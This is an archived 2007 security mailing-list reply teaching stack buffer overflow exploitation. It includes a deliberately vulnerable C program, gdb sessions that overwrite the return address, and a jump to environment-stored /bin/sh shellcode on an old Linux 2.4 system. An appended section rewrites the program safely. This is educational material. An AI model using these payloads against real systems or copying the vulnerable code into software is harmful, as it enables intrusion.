Vuln Dev
Re: Learning buffer overflow help Jun 07 2007 09:39AM
Marco Ivaldi (raptor 0xdeadbeef info)
Hey Eric,

On Wed, 6 Jun 2007, erk_3 (at) hotmail (dot) com [email concealed] wrote:

> Hello everyone, I have studied a lot on buffer overflows and I understand the
> theory behind it. Thing is, any example I follow says once you can overwrite
> the EIP you can control the flow of the program (in a nutshell).
I guess you're missing something basic here... Take a look at the following

nobody@slack10:/tmp$ cat /etc/slackware-version
Slackware 10.2.0
nobody@slack10:/tmp$ uname -a
Linux slack10 2.4.31 #6 Sun Jun 5 19:04:47 PDT 2005 i686 unknown unknown
nobody@slack10:/tmp$ cat > vuln.c
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[])
{
	char name[4];
	strcpy(name, argv[1]);	/* unbounded copy into a 4-byte stack buffer */
	printf(name); /* there's a pretty format string bug here too;) */
	return 0;
}
nobody@slack10:/tmp$ make vuln
cc vuln.c -o vuln
nobody@slack10:/tmp$ gdb -q ./vuln
Using host libthread_db library "/lib/".
(gdb) r 1234AAAABBBB
Starting program: /tmp/vuln 1234AAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

So far, so good. Now, to overwrite the %eip with an arbitrary valid address,
you should do something like that instead:

(gdb) r `printf "1234AAAA\xee\xee\xff\xbf"`
Starting program: /tmp/vuln `printf "1234AAAA\xee\xee\xff\xbf"`

Program received signal SIGILL, Illegal instruction.
0xbfffeeee in ?? ()

Finally, to actually exploit the overflow to run an arbitrary shellcode:

nobody@slack10:/tmp$ export SC=`printf
(gdb) x/s 0xbfffff73
0xbfffff73: "SC=1Ph//shh/bin\211PS\211\231\v\200"
(gdb) x/s 0xbfffff76
0xbfffff76: "1Ph//shh/bin\211PS\211\231\v\200"
(gdb) r `printf "1234AAAA\x76\xff\xff\xbf"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vuln `printf "1234AAAA\x76\xff\xff\xbf"`

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/
(gdb) c

This is what happens on a kinda old system based on Linux kernel 2.4,
without additional protections. YMMV on newer platforms...

You may also want to check out some exploitation examples here:


Marco Ivaldi
Antifork Research, Inc.
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
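As an added example (editor's code, not from Marco's post or from any project), here is vuln.c rewritten so that the two defects the transcript points at cannot be reached: the unbounded strcpy() into name[4] that let the 12-byte argument run over the saved frame pointer and return address (the 0x42424242 crash), and printf(name), which hands user input to the format parser. The function names, the bounded-copy helper and the greeting format are this example's own choices; the 4-byte buffer size is kept from the post so the rejection boundary matches it.

```c
/* Added example (not from the original post): the vulnerable program from
 * the thread, rewritten with bounded copying and a literal format string.
 * Function and parameter names below are this example's own choices. */
#define _POSIX_C_SOURCE 200809L   /* for strnlen() */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Same buffer size as vuln.c in the post: 3 characters plus a NUL. */
#define NAME_LEN 4

/* Copy src into dst (dstlen bytes) only if it fits including the NUL.
 * Returns 0 on success and -1 on rejection; on rejection dst is left
 * as an empty string so callers never print uninitialised stack bytes.
 * strcpy() in the original has no such check: with a 4-byte buffer,
 * 12 bytes of input run through name[], the saved frame pointer and
 * the saved return address, which is why gdb reported 0x42424242. */
int copy_name_bounded(char *dst, size_t dstlen, const char *src)
{
    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    size_t n = strnlen(src, dstlen);   /* never scan past dstlen bytes */
    if (n >= dstlen)                   /* no room left for the terminator */
        return -1;
    memcpy(dst, src, n + 1);           /* n + 1 <= dstlen, so in bounds */
    return 0;
}

/* Format the greeting into out with a literal format string, so that
 * '%' sequences in name are emitted as data rather than interpreted.
 * The original printf(name) lets the caller supply the format itself.
 * Returns snprintf()'s result (chars that would have been written),
 * or -1 on bad arguments. */
int format_greeting(char *out, size_t outlen, const char *name)
{
    if (out == NULL || outlen == 0 || name == NULL)
        return -1;
    return snprintf(out, outlen, "Hello, %s\n", name);
}

/* Hardened equivalent of main() from the post: refuse over-long input
 * instead of letting it spill over the return address.
 * Returns 0 when the greeting was produced, -1 when the input was rejected. */
int handle_name(const char *arg, char *out, size_t outlen)
{
    char name[NAME_LEN];
    if (copy_name_bounded(name, sizeof name, arg) != 0)
        return -1;                     /* input does not fit: reject it */
    return format_greeting(out, outlen, name) < 0 ? -1 : 0;
}

int main(int argc, char *argv[])
{
    char out[64];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <name>\n", argv[0]);
        return 2;
    }
    if (handle_name(argv[1], out, sizeof out) != 0) {
        fprintf(stderr, "name too long (max %d chars)\n", NAME_LEN - 1);
        return 1;
    }
    fputs(out, stdout);
    return 0;
}
```

Running it with the transcript's argument `1234AAAABBBB` now yields "name too long" and exit status 1 instead of a SIGSEGV at 0x42424242; a three-character argument such as `%x` is printed literally rather than read as a format directive. Note that a bounded copy removes this particular overflow but says nothing about the rest of the program, which is why the post's remark that newer platforms add protections (stack canaries, non-executable stacks) still matters as a second layer.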

Copyright 2010, SecurityFocus